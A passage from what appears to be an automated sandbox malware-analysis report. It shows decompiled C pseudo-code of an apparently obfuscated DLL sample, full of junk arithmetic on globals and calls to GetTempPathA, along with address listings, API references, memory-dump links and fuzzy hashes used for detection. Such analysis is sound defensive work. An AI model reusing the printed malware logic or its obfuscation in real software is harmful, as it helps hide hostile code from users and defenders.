						_t188 = _t283 - 0xb401; // 0xab75cc6
						 *0x6e24b000 = _t373 + _t188 +  *0x6e24b000 +  *0x6e24b000;
						_t374 =  *0x6e24b004; // 0xab810c7
						 *0x6e24b000 = _t374 - _v48 * 0x2f;
						_t476 = _v48 - 0x48 -  *0x6e24b004 +  *0x6e24b000;
						__eflags = _t476;
						 *0x6e24b000 = _t476;
					} else {
						_t376 = _v80;
						__eflags =  *((intOrPtr*)(_t376 + 0x6e24b050)) - _v136;
						if( *((intOrPtr*)(_t376 + 0x6e24b050)) <= _v136) {
							goto L46;
						}
					}
				}
				E6E1FB840(_v48); // executed
				__eflags =  *((intOrPtr*)(0x6e24b024)) -  *0x6e24b000; // 0x565
				if(__eflags <= 0) {
					_t460 =  *0x6e24b0d8; // 0xf1cde0
					 *0x6EDF8BBD = _t460;
					_t280 =  *0x6e24b0d8; // 0xf1cde0
					_t369 =  *0x6e24b000; // 0x565
					_t195 = _t280 - 0xb401; // -44700
					_v48 = _t369 + _t195 + _v48 + _v48;
					_t370 =  *0x6e24b000; // 0x565
					_v48 = _t370 -  *0x6e24b0d8 * 0x2f;
					_t464 =  *0x6e24b0d8; // 0xf1cde0
					_t467 = _t464 - 0x48 -  *0x6e24b000 + _v48;
					__eflags = _t467;
					_v48 = _t467;
				}
				 *0x6e24b0d8 =  *0x6e24b000 * 0x268e +  *0x6e24b0d8;
				_t359 =  *0x6e24b0d8; // 0xf1cde0
				_v48 = _t359 + 1 - _v60;
				_v96 = 1;
				_v8 = 0xffffffff;
				E6E1FA720();
				 *[fs:0x0] = _v16;
				__eflags = _v20 ^ _t513;
				return E6E203D51(_v20 ^ _t513);
			}
































































































    0x6e1f7ca0
    0x6e1f7ca0
    0x6e1f7ca0
    0x6e1f7ca3
    0x6e1f7ca5
    0x6e1f7cb0
    0x6e1f7cb4
    0x6e1f7cb9
    0x6e1f7cbb
    0x6e1f7cbe
    0x6e1f7cbf
    0x6e1f7cc3
    0x6e1f7cc9
    0x6e1f7cd0
    0x6e1f7cd5
    0x6e1f7cdb
    0x6e1f7ce9
    0x6e1f7ceb
    0x6e1f7d00
    0x6e1f7d05
    0x6e1f7d08
    0x6e1f7d0d
    0x6e1f7d11
    0x6e1f7d19
    0x6e1f7d1f
    0x6e1f7d2c
    0x6e1f7d32
    0x6e1f7d3b
    0x6e1f7d41
    0x6e1f7d47
    0x6e1f7d4c
    0x6e1f7d4e
    0x6e1f7d56
    0x6e1f7d65
    0x6e1f7d6a
    0x6e1f7d83
    0x6e1f7d9d
    0x6e1f7da0
    0x6e1f7da3
    0x6e1f7da9
    0x6e1f7db2
    0x6e1f7dc4
    0x6e1f7dc4
    0x6e1f7dcc
    0x6e1f7dd2
    0x6e1f7de9
    0x6e1f7dee
    0x6e1f7dfd
    0x6e1f7e00
    0x6e1f7e0c
    0x6e1f7e0f
    0x6e1f7e12
    0x6e1f7e15
    0x6e1f7e1b
    0x6e1f7e1e
    0x6e1f7e24
    0x6e1f7e36
    0x00000000
    0x6e1f7e26
    0x6e1f7e26
    0x6e1f7e2c
    0x6e1f7e32
    0x00000000
    0x00000000
    0x6e1f7e34
    0x6e1f7e32
    0x6e1f7db4
    0x6e1f7db7
    0x6e1f7dc0
    0x00000000
    0x6e1f7dc2
    0x6e1f7d76
    0x6e1f7d76
    0x6e1f7d7e
    0x00000000
    0x6e1f7d7e
    0x6e1f7dc0
    0x00000000
    0x6e1f7db2
    0x6e1f7e3b
    0x6e1f7e48
    0x6e1f7e4e
    0x6e1f7e51
    0x6e1f7e62
    0x6e1f7e65
    0x6e1f7e68
    0x6e1f7e79
    0x6e1f7e7c
    0x6e1f7e9b
    0x6e1f7ea0
    0x6e1f7ed2
    0x6e1f7ee1
    0x6e1f7ee7
    0x6e1f7eec
    0x6e1f7ef2
    0x6e1f7efc
    0x6e1f7efc
    0x6e1f7eff
    0x6e1f7ea2
    0x6e1f7ea2
    0x6e1f7eaf
    0x6e1f7eb4
    0x6e1f7ec6
    0x6e1f7ec6
    0x6e1f7f02
    0x6e1f7f1b
    0x6e1f7f1b
    0x6e1f7f22
    0x00000000
    0x00000000
    0x6e1f7f2c
    0x6e1f7f32
    0x6e1f7f38
    0x6e1f7f3c
    0x6e1f7f4c
    0x6e1f7f5b
    0x6e1f7f6c
    0x6e1f7f72
    0x00000000
    0x00000000
    0x6e1f7f74
    0x6e1f7f3a
    0x6e1f7f0e
    0x6e1f7f0e
    0x6e1f7f13
    0x6e1f7f13
    0x6e1f7f16
    0x00000000
    0x6e1f7f16
    0x00000000
    0x6e1f7f38
    0x6e1f7f86
    0x6e1f7f89
    0x6e1f7f98
    0x6e1f7fac
    0x6e1f7fb2
    0x6e1f7fcd
    0x6e1f7fcd
    0x6e1f7fd4
    0x00000000
    0x00000000
    0x6e1f7fde
    0x6e1f7fe3
    0x6e1f7fe9
    0x6e1f7fed
    0x6e1f7ffe
    0x6e1f800a
    0x6e1f801a
    0x6e1f8020
    0x00000000
    0x00000000
    0x6e1f8022
    0x6e1f7feb
    0x6e1f7fbe
    0x6e1f7fbe
    0x6e1f7fc4
    0x6e1f7fc4
    0x6e1f7fc7
    0x00000000
    0x6e1f7fc7
    0x00000000
    0x6e1f7fe9
    0x6e1f8026
    0x6e1f802e
    0x6e1f8031
    0x6e1f8037
    0x6e1f803a
    0x6e1f803c
    0x6e1f8046
    0x6e1f804f
    0x6e1f8070
    0x6e1f807a
    0x6e1f808c
    0x6e1f808c
    0x6e1f808f
    0x6e1f803e
    0x6e1f8041
    0x6e1f8044
    0x00000000
    0x00000000
    0x6e1f8044
    0x6e1f803c
    0x6e1f8097
    0x6e1f80a4
    0x6e1f80a9
    0x6e1f80b4
    0x6e1f80bc
    0x6e1f80ce
    0x6e1f80da
    0x6e1f80df
    0x6e1f80e5
    0x6e1f80ea
    0x6e1f80f8
    0x6e1f80fa
    0x6e1f8100
    0x6e1f810f
    0x6e1f8114
    0x6e1f8127
    0x6e1f812a
    0x6e1f812d
    0x6e1f8138
    0x6e1f8149
    0x6e1f814f
    0x6e1f815d
    0x6e1f8160
    0x6e1f816f
    0x6e1f8174
    0x6e1f8177
    0x6e1f817c
    0x6e1f8180
    0x6e1f8188
    0x6e1f819c
    0x6e1f819f
    0x6e1f81a3
    0x6e1f81a7
    0x6e1f81ac
    0x6e1f81b2
    0x6e1f81bf
    0x6e1f81a5
    0x6e1f81c4
    0x6e1f81cc
    0x6e1f81cc
    0x6e1f81d2
    0x6e1f81d2
    0x6e1f81dc
    0x6e1f81e6
    0x6e1f81e9
    0x6e1f81ec
    0x6e1f81ef
    0x6e1f81f5
    0x6e1f81fb
    0x6e1f81fe
    0x6e1f8223
    0x6e1f8229
    0x6e1f822c
    0x6e1f822f
    0x6e1f8236
    0x6e1f8263
    0x6e1f8276
    0x6e1f827c
    0x6e1f8294
    0x6e1f8297
    0x6e1f8297
    0x6e1f829a
    0x6e1f829d
    0x6e1f82a0
    0x6e1f8238
    0x6e1f8238
    0x6e1f823c
    0x00000000
    0x6e1f823e
    0x6e1f8247
    0x6e1f8258
    0x6e1f825b
    0x6e1f825e
    0x6e1f825e
    0x6e1f823c
    0x6e1f82a3
    0x6e1f82b1
    0x6e1f82be
    0x6e1f82c8
    0x6e1f82dd
    0x6e1f82e0
    0x6e1f82e3
    0x6e1f82ec
    0x6e1f82ec
    0x6e1f82ef
    0x6e1f82ef
    0x6e1f82fe
    0x6e1f8305
    0x6e1f8312
    0x6e1f8319
    0x6e1f831c
    0x6e1f8322
    0x6e1f832e
    0x6e1f8331
    0x6e1f8333
    0x6e1f8346
    0x6e1f8352
    0x6e1f8358
    0x6e1f835e
    0x6e1f8361
    0x6e1f8367
    0x6e1f837a
    0x6e1f8384
    0x6e1f838c
    0x6e1f839e
    0x6e1f839e
    0x6e1f83a4
    0x6e1f8335
    0x6e1f8335
    0x6e1f833e
    0x6e1f8344
    0x00000000
    0x00000000
    0x6e1f8344
    0x6e1f8333
    0x6e1f83ae
    0x6e1f83c4
    0x6e1f83ca
    0x6e1f83d3
    0x6e1f83d9
    0x6e1f83df
    0x6e1f83e4
    0x6e1f83ea
    0x6e1f83f7
    0x6e1f8401
    0x6e1f8409
    0x6e1f840c
    0x6e1f841b
    0x6e1f841b
    0x6e1f841e
    0x6e1f841e
    0x6e1f8431
    0x6e1f8436
    0x6e1f8442
    0x6e1f8445
    0x6e1f844c
    0x6e1f8456
    0x6e1f8461
    0x6e1f846d
    0x6e1f8477

    APIs
    • GetCurrentDirectoryA.KERNEL32(0000070B,?,?,?,00000000), ref: 6E1F7D5F
    • GetEnvironmentVariableA.KERNELBASE(word ,?,0000070B,?,?,?,?,00000000), ref: 6E1F7FAC
    • SetConsoleCP.KERNEL32(00000000,?,?,?,?,00000000), ref: 6E1F8097
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ConsoleCurrentDirectoryEnvironmentVariable
    • String ID: word
    • API String ID: 575343565-2199854786
    • Opcode ID: a604d945237c473c10e79ca2c967c702b976fef5dada8a24792576c9a9460870
    • Instruction ID: 2eb3790b89b799f952992014205335322d1ff072b7e01e2149189ca196398e9a
    • Opcode Fuzzy Hash: a604d945237c473c10e79ca2c967c702b976fef5dada8a24792576c9a9460870
    • Instruction Fuzzy Hash: 64420870D00608CFCB29EFACD598A9DBBB3FB89305F10922AD425A7389E7706945CF54
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1FB840, Relevance: 7.3, APIs: 1, Strings: 2, Instructions: 2034COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 83%
    			E6E1FB840(signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v33;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr _v48;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v96;
				signed int _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				intOrPtr _v136;
				signed int _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				signed int _v176;
				signed int _v180;
				intOrPtr _v184;
				signed int _v188;
				intOrPtr _v192;
				signed int _v196;
				intOrPtr _v200;
				signed int _v204;
				intOrPtr _v208;
				signed int _v212;
				intOrPtr _v216;
				signed int _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				signed int _v232;
				void* __esi;
				void* __ebp;
				signed int _t418;
				signed int _t425;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t432;
				CHAR* _t440;
				signed int _t441;
				signed int _t443;
				signed int _t446;
				void* _t447;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t465;
				void* _t472;
				signed int _t474;
				signed int _t478;
				signed int _t480;
				signed int _t495;
				signed int _t500;
				signed int _t503;
				signed int _t505;
				void* _t506;
				signed int _t507;
				signed int _t510;
				signed int _t516;
				signed int _t518;
				signed int _t519;
				signed int _t523;
				signed int _t537;
				signed int _t538;
				signed int _t544;
				signed int _t546;
				signed int _t552;
				signed int _t557;
				signed int _t558;
				signed int _t560;
				signed int _t571;
				signed int _t572;
				void* _t573;
				signed int _t574;
				signed int _t577;
				signed int _t581;
				signed int _t597;
				signed int _t618;
				void* _t620;
				signed int _t625;
				signed int _t627;
				signed int _t631;
				signed int _t633;
				signed int _t634;
				signed int _t636;
				void* _t638;
				signed int _t640;
				signed int _t648;
				signed int _t651;
				signed int _t653;
				signed int _t657;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t668;
				signed int _t670;
				signed int _t686;
				signed int _t687;
				signed int _t705;
				signed int _t710;
				intOrPtr _t711;
				signed int _t712;
				signed int _t714;
				void* _t718;
				signed int _t720;
				signed int _t724;
				signed int _t725;
				void* _t726;
				signed int _t731;
				signed int _t741;
				signed int _t742;
				signed int _t747;
				signed int _t753;
				signed int _t754;
				signed int _t755;
				void* _t758;
				signed int _t760;
				void* _t761;
				signed int _t763;
				signed int _t767;
				signed int _t769;
				void* _t770;
				signed int _t772;
				signed int _t777;
				signed int _t780;
				signed int _t781;
				signed int _t786;
				signed int _t787;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t793;
				signed int _t798;
				signed int _t801;
				signed int _t805;
				signed int _t807;
				signed int _t812;
				signed int _t819;
				signed int _t824;
				signed int _t828;
				signed int _t830;
				signed int _t836;
				signed int _t840;
				signed int _t846;
				signed int _t847;
				signed int _t854;
				signed int _t857;
				signed int _t861;
				signed int _t866;
				signed int _t868;
				signed int _t870;
				signed int _t879;
				signed int _t884;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t892;
				signed int _t894;
				signed int _t898;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t908;
				signed int _t910;
				signed int _t917;
				signed int _t918;
				signed int _t926;
				signed int _t928;
				signed int _t936;
				signed int _t940;
				signed int _t942;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t951;
				signed int _t954;
				signed int _t956;
				signed int _t971;
				signed int _t972;
				signed int _t979;
				signed int _t981;
				signed int _t986;
				signed int _t991;
				signed int _t992;
				signed int _t993;
				signed int _t996;
				signed int _t1005;
				signed int _t1018;
				signed int _t1028;
				signed char _t1030;
				signed int _t1033;
				signed int _t1043;
				signed int _t1046;
				signed int _t1048;
				signed int _t1050;
				signed int _t1055;
				signed int _t1059;
				signed int _t1062;
				signed char _t1064;
				signed int _t1067;
				signed int _t1074;
				signed int _t1078;
				signed int _t1083;
				signed char _t1085;
				signed int _t1086;
				signed int _t1087;
				signed int _t1089;
				signed int _t1092;
				signed int _t1098;
				signed int _t1099;
				signed int _t1103;
				signed int _t1106;
				signed int _t1111;
				signed int _t1113;
				signed int _t1121;
				signed int _t1125;
				signed int _t1128;
				signed int _t1133;
				signed int _t1141;
				signed int _t1145;
				signed char _t1147;
				signed int _t1151;
				signed int _t1153;
				signed int _t1156;
				signed int _t1160;
				signed int _t1163;
				signed char _t1165;
				signed int _t1170;
				signed int _t1174;
				signed int _t1178;
				signed int _t1184;
				signed int _t1190;
				signed int _t1195;
				signed int _t1201;
				signed int _t1208;
				signed int _t1215;
				signed int _t1227;
				signed int _t1232;
				signed int _t1241;
				signed int _t1248;
				signed int _t1251;
				signed int _t1252;
				signed int _t1253;
				signed int _t1256;
				signed int _t1257;
				signed int _t1262;
				signed int _t1264;
				signed int _t1265;
				signed int _t1266;
				signed int _t1272;
				signed int _t1284;
				signed int _t1285;
				signed int _t1291;
				signed int _t1292;
				signed int _t1293;
				signed int _t1302;
				signed int _t1303;
				signed int _t1307;
				signed int _t1309;
				signed int _t1321;
				signed int _t1322;
				signed int _t1324;
				signed int _t1327;
				signed int _t1329;
				signed int _t1330;
				signed char _t1332;
				signed int _t1333;
				signed int _t1337;
				signed int _t1339;
				signed int _t1343;
				signed char _t1345;
				void* _t1351;
				signed int _t1356;
				signed int _t1361;
				signed int _t1363;
				signed int _t1370;
				signed int _t1371;
				signed int _t1384;
				signed int _t1385;
				intOrPtr _t1386;
				signed int _t1392;
				signed int _t1393;
				signed int _t1396;
				signed int _t1403;
				signed int _t1404;
				signed int _t1411;
				signed int _t1417;
				signed int _t1421;
				signed int _t1423;
				signed int _t1426;
				signed int _t1437;
				signed int _t1439;
				signed int _t1443;
				signed int _t1444;
				signed int _t1446;
				signed int _t1449;
				signed int _t1450;
				signed int _t1456;
				signed int _t1459;
				void* _t1467;
				signed int _t1471;
				signed int _t1475;
				signed int _t1481;
				signed int _t1483;
				signed int _t1484;
				signed int _t1495;
				signed int _t1497;
				intOrPtr _t1498;
				signed int _t1499;
				signed int _t1500;
				signed int _t1503;
				signed int _t1504;
				signed int _t1505;
				signed int _t1506;
				signed int _t1509;
				signed int _t1510;
				signed int _t1512;
				signed int _t1515;
				signed int _t1518;
				signed int _t1524;
				signed int _t1532;
				signed int _t1533;
				signed int _t1537;
				signed int _t1538;
				signed int _t1543;
				signed int _t1544;
				signed int _t1547;
				signed int _t1550;
				signed int _t1553;
				signed int _t1560;
				signed int _t1563;
				signed int _t1566;
				signed int _t1568;
				signed int _t1572;
				signed int _t1574;
				signed int _t1575;
				signed int _t1579;
				signed int _t1584;
				signed int _t1588;
				signed int _t1593;
				signed int _t1599;
				signed int _t1604;
				signed int _t1608;
				signed int _t1616;
				signed int _t1621;
				signed int _t1628;
				signed int _t1633;
				signed int _t1635;
				signed int _t1637;
				signed int _t1639;
				signed int _t1641;
				signed int _t1643;
				void* _t1647;
				void* _t1648;
				void* _t1650;
				void* _t1651;
				void* _t1652;
				void* _t1654;
				void* _t1655;
				void* _t1661;
				void* _t1666;
				void* _t1667;
				void* _t1669;
				signed int _t1670;
				void* _t1671;
				void* _t1674;
				void* _t1676;

				_v8 = 0x221f;
				_v12 = 0;
				_v20 = 0;
				 *0x6e24b0d4 = _a4 * 0x268e + ( *0x6e24b0d4 & 0x000000ff);
				_t418 =  *0x6e24b00c; // 0x0
				_t1654 = _t418 -  *0x6e24b00c; // 0x0
				if(_t1654 >= 0) {
					if(_t1654 > 0) {
						L3:
						_t1616 =  *0x6e24b008; // 0xcac97647
						_t854 =  *0x6e24b00c; // 0x0
						asm("adc eax, 0x0");
						asm("sbb eax, ecx");
						 *0x6e24b008 = _t1616 + 5 -  *0x6e24b0d8;
						 *0x6e24b00c = _t854;
						 *0x6EDF8BBD =  *0x6EDF8BBD -  *0x6e24b0d8;
						_t1621 =  *0x6e24b008; // 0xcac97647
						_t857 =  *0x6e24b00c; // 0x0
						asm("adc eax, 0x0");
						asm("sbb eax, ecx");
						 *0x6e24b008 = _t1621 + 5 -  *0x6e24b0d8;
						 *0x6e24b00c = _t857;
					} else {
						_t1241 =  *0x6e24b008; // 0xcac97647
						_t1655 = _t1241 -  *0x6e24b008; // 0xcac97647
						if(_t1655 >= 0) {
							goto L3;
						}
					}
				}
				_v40 = 0x88;
				if( *((intOrPtr*)(_v40 + 0x6e24b050)) == 0x170c &&  *((intOrPtr*)(_v40 + 0x6e24b054)) == 0) {
					asm("cdq");
					 *0x6e24b0d4 = ( *0x6e24b0d4 & 0x000000ff) +  *0x6E24B078;
					_v8 = ( *0x6e24b0d4 & 0x000000ff) + 1 - ( *0x6e24b0d4 & 0x000000ff);
				}
				_t861 =  *0x6e24b0d8; // 0xf1cde0
				 *0x6e24b0d8 = _t861 +  *0x6e24b008 +  *0x6e24b0d0;
				if( *0x6E24B048 +  *0x6EDF8BBD != 0x2af) {
					_t866 =  *0x6e24b000; // 0x565
					 *0x6E24B010 = _t866 -  *0x6e24b0d8 * 0x2f;
					_t868 =  *0x6e24b0d8; // 0xf1cde0
					_t1248 =  *0x6e24b0d8; // 0xf1cde0
					_t18 = _t868 - 0xb401; // 0xf119df
					asm("adc ecx, [0x6e24b00c]");
					_t425 = _t1248 + _t18 +  *0x6e24b008 +  *0x6e24b008;
					__eflags = _t425;
					asm("adc ecx, [0x6e24b00c]");
					 *0x6e24b008 = _t425;
					 *0x6e24b00c = 0;
				} else {
					_t847 =  *0x6e24b008; // 0xcac97647
					 *0x6e24b0d8 = _t847 - 0x18 +  *0x6e24b0d8;
					_t1232 =  *0x6e24b0d8; // 0xf1cde0
					asm("adc edx, [0x6e24b00c]");
					 *0x6e24b008 = _t1232 - 0x48 -  *0x6e24b000 +  *0x6e24b008;
					 *0x6e24b00c = 0;
				}
				 *0x6e24bf80 = 0x6e24d308;
				_v8 = _a4 * 0x268e + (_v8 & 0x0000ffff);
				_t870 =  *0x6e24b0d0; // 0x38c975ff
				 *0x6e24b0d4 = _t870 - 0x18 +  *0x6e24b008;
				_t1251 =  *0x6e24b0d0; // 0x38c975ff
				_t427 = E6E1F6B70(_t1251);
				_t1648 = _t1647 + 4;
				_v8 = _t427;
				_t428 =  *0x6e24b0d8; // 0xf1cde0
				_v92 = _t428;
				_v88 = 0;
				_t1252 =  *0x6e24b00c; // 0x0
				_t1661 = _t1252 - _v88;
				if(_t1661 >= 0) {
					if(_t1661 > 0) {
						L13:
						_t1227 =  *0x6e24b008; // 0xcac97647
						 *0x6e24b0d8 = _t1227 + 5 -  *0x6e24b000;
						 *0x6EDF8BBD =  *0x6EDF8BBD -  *0x6e24b000;
						_t1608 =  *0x6e24b008; // 0xcac97647
						 *0x6e24b0d8 = _t1608 + 5 -  *0x6e24b000;
					} else {
						_t846 =  *0x6e24b008; // 0xcac97647
						if(_t846 >= _v92) {
							goto L13;
						}
					}
				}
				_t429 =  *0x6e24b0d8; // 0xf1cde0
				asm("adc ecx, [0x6e24b00c]");
				_t1253 =  *0x6e24b008; // 0xcac97647
				_t432 =  *0x6e24b00c; // 0x0
				asm("sbb eax, ecx");
				 *0x6e24b008 = _t1253 - _t429 + 2 +  *0x6e24b008;
				 *0x6e24b00c = _t432;
				_v56 = 0x6e221250;
				asm("cdq");
				 *0x6e24b0d0 = ( *0x6e24b0d4 & 0x000000ff) + 1 -  *0x6e24b008;
				 *0x6e24b0d4 = ( *0x6e24b0d4 & 0x000000ff) +  *0x6e24b0d0 +  *0x6e24b008;
				if( *0x6E24B024 <= (_v8 & 0x0000ffff)) {
					_t836 =  *0x6e24b0d8; // 0xf1cde0
					 *0x6EDF8BBD = _t836;
					_t1604 =  *0x6e24b0d8; // 0xf1cde0
					 *0x6e24b0d0 = (_v8 & 0x0000ffff) + _t1604 - 0xb401 +  *0x6e24b0d0 +  *0x6e24b0d0;
					 *0x6e24b0d0 = (_v8 & 0x0000ffff) -  *0x6e24b0d8 * 0x2f;
					_t840 =  *0x6e24b0d8; // 0xf1cde0
					 *0x6e24b0d0 = _t840 - 0x48 - (_v8 & 0x0000ffff) +  *0x6e24b0d0;
				}
				_t1256 =  *0x6e24b0d0; // 0x38c975ff
				_v8 = E6E1F66C0(_t1256);
				asm("cdq");
				_t879 =  *0x6e24b008; // 0xcac97647
				 *0x6e24b0d0 = _t879 - ( *0x6e24b0d4 & 0x000000ff) * 0x2f;
				_push(0x70b);
				_t440 = E6E208999(_t879 - ( *0x6e24b0d4 & 0x000000ff) * 0x2f);
				_t1650 = _t1648 + 8;
				_v52 = _t440;
				_t1257 =  *0x6e24b008; // 0xcac97647
				_t441 =  *0x6e24b00c; // 0x0
				asm("sbb eax, 0x0");
				asm("adc eax, ecx");
				 *0x6e24b008 = _t1257 - 0x18 +  *0x6e24b0d8;
				 *0x6e24b00c = _t441;
				_v8 = GetTempPathA(0x70b, _v52);
				_t443 =  *0x6e24b000; // 0x565
				_v100 = _t443;
				_v96 = 0;
				_t1666 = _v96 -  *0x6e24b00c; // 0x0
				if(_t1666 >= 0) {
					if(_t1666 > 0) {
						L19:
						_t1215 =  *0x6e24b000; // 0x565
						 *0x6e24b008 = _t1215 + 5 - (_v8 & 0x0000ffff);
						 *0x6e24b00c = 0;
						asm("cdq");
						asm("sbb eax, edx");
						 *0x6E24B058 =  *0x6EDF8BFD - (_v8 & 0x0000ffff);
						_t1599 =  *0x6e24b000; // 0x565
						 *0x6e24b008 = _t1599 + 5 - (_v8 & 0x0000ffff);
						 *0x6e24b00c = 0;
					} else {
						_t1667 = _v100 -  *0x6e24b008; // 0xcac97647
						if(_t1667 >= 0) {
							goto L19;
						}
					}
				}
				_t1262 =  *0x6e24b0d0; // 0x38c975ff
				_t1669 = _t1262 -  *0x6e24b0d8; // 0xf1cde0
				if(_t1669 >= 0) {
					_t824 =  *0x6e24b0d0; // 0x38c975ff
					 *0x6e24b0d8 = _t824 + 5 - (_v8 & 0x0000ffff);
					 *0x6EDF8BBD =  *0x6EDF8BBD - (_v8 & 0x0000ffff);
					_t828 =  *0x6e24b0d0; // 0x38c975ff
					_t830 = _t828 + 5 - (_v8 & 0x0000ffff);
					_t1670 = _t830;
					 *0x6e24b0d8 = _t830;
				}
				_t1264 =  *0x6e24b0d0; // 0x38c975ff
				E6E1FF690(_t1670, _t1264, _v8 & 0x0000ffff,  *0x6e24bf80, _v56, 0x498b);
				_t1651 = _t1650 + 0x14;
				_t446 =  *0x6e24b00c; // 0x0
				_t884 =  *0x6e24b008; // 0xcac97647
				_t447 = E6E203D70(_t884, _t446, 0x268e, 0);
				asm("cdq");
				 *0x6e24b0d4 = _t447 + ( *0x6e24b0d4 & 0x000000ff);
				_t1265 =  *0x6e24b0d8; // 0xf1cde0
				_v108 = _t1265;
				_v104 = 0;
				_t887 =  *0x6e24b00c; // 0x0
				_t1671 = _t887 - _v104;
				if(_t1671 >= 0) {
					if(_t1671 > 0) {
						L25:
						_t819 =  *0x6e24b008; // 0xcac97647
						 *0x6e24b0d8 = _t819 + 5 -  *0x6e24b000;
						 *0x6EDF8BBD =  *0x6EDF8BBD -  *0x6e24b000;
						_t1208 =  *0x6e24b008; // 0xcac97647
						 *0x6e24b0d8 = _t1208 + 5 -  *0x6e24b000;
					} else {
						_t1593 =  *0x6e24b008; // 0xcac97647
						if(_t1593 >= _v108) {
							goto L25;
						}
					}
				}
				_t1266 =  *0x6e24b0d8; // 0xf1cde0
				asm("adc eax, [0x6e24b00c]");
				asm("adc eax, [0x6e24b00c]");
				asm("adc eax, [0x6e24b00c]");
				 *0x6e24b008 = _t1266 - 0xb401 +  *0x6e24b008 +  *0x6e24b008 +  *0x6e24b008;
				 *0x6e24b00c = 0;
				_v20 = 0x147042e;
				_t888 =  *0x6e24b0d0; // 0x38c975ff
				_t1674 = _t888 -  *0x6e24b0d8; // 0xf1cde0
				if(_t1674 >= 0) {
					_t1584 =  *0x6e24b0d0; // 0x38c975ff
					 *0x6e24b0d8 = _t1584 + 5 - (_v8 & 0x0000ffff);
					 *0x6EDF8BBD =  *0x6EDF8BBD - (_v8 & 0x0000ffff);
					_t1588 =  *0x6e24b0d0; // 0x38c975ff
					 *0x6e24b0d8 = _t1588 + 5 - (_v8 & 0x0000ffff);
				}
				_t889 =  *0x6e24b0d8; // 0xf1cde0
				_v116 = _t889;
				_v112 = 0;
				_t451 =  *0x6e24b00c; // 0x0
				_t1676 = _t451 - _v112;
				if(_t1676 >= 0) {
					if(_t1676 > 0) {
						L31:
						_t1579 =  *0x6e24b008; // 0xcac97647
						 *0x6e24b0d8 = _t1579 + 5 -  *0x6e24b000;
						 *0x6EDF8BBD =  *0x6EDF8BBD -  *0x6e24b000;
						_t812 =  *0x6e24b008; // 0xcac97647
						 *0x6e24b0d8 = _t812 + 5 -  *0x6e24b000;
					} else {
						_t1201 =  *0x6e24b008; // 0xcac97647
						if(_t1201 >= _v116) {
							goto L31;
						}
					}
				}
				_t890 =  *0x6e24b0d0; // 0x38c975ff
				_t452 = E6E1F66C0(_t890);
				_t1652 = _t1651 + 4;
				_v8 = _t452;
				_t1272 =  *0x6e24b008; // 0xcac97647
				_t453 =  *0x6e24b00c; // 0x0
				asm("sbb eax, 0x0");
				asm("adc eax, ecx");
				 *0x6e24b008 = _t1272 - 0x18 +  *0x6e24b0d8;
				 *0x6e24b00c = _t453;
				asm("adc eax, [0x6e24b00c]");
				 *0x6e24b008 =  *0x6e24b0d8 * 0x268e +  *0x6e24b008;
				 *0x6e24b00c = 0;
				asm("cdq");
				_t892 =  *0x6e24b0d0; // 0x38c975ff
				 *0x6e24b0d0 = _t892 + ( *0x6e24b0d4 & 0x000000ff) - 0x48 -  *0x6e24b008;
				_v28 = 0xe;
				 *0x6e24b0d4 = ( *0x6e24b0d4 & 0x000000ff) +  *0x6e24b000 +  *0x6e24b008;
				_v32 = 0xb1;
				asm("cdq");
				_t894 =  *0x6e24b008; // 0xcac97647
				 *0x6e24b000 = _t894 - ( *0x6e24b0d4 & 0x000000ff) * 0x2f;
				if( *((intOrPtr*)(0x6e24b048)) +  *0x6EDF8BBD != 0x2af) {
					_t898 =  *0x6e24b000; // 0x565
					 *((intOrPtr*)(0x6e24b010)) = _t898 -  *0x6e24b0d8 * 0x2f;
					_t900 =  *0x6e24b0d8; // 0xf1cde0
					_t1284 =  *0x6e24b0d8; // 0xf1cde0
					_t85 = _t900 - 0xb401; // 0xf119df
					asm("adc ecx, [0x6e24b00c]");
					_t465 = _t1284 + _t85 +  *0x6e24b008 +  *0x6e24b008;
					__eflags = _t465;
					asm("adc ecx, [0x6e24b00c]");
					 *0x6e24b008 = _t465;
					 *0x6e24b00c = 0;
				} else {
					_t807 =  *0x6e24b008; // 0xcac97647
					 *0x6e24b0d8 = _t807 - 0x18 +  *0x6e24b0d8;
					_t1195 =  *0x6e24b0d8; // 0xf1cde0
					asm("adc edx, [0x6e24b00c]");
					 *0x6e24b008 = _t1195 - 0x48 -  *0x6e24b000 +  *0x6e24b008;
					 *0x6e24b00c = 0;
				}
				_t1285 =  *0x6e24b0d8; // 0xf1cde0
				asm("adc eax, [0x6e24b00c]");
				asm("adc eax, [0x6e24b00c]");
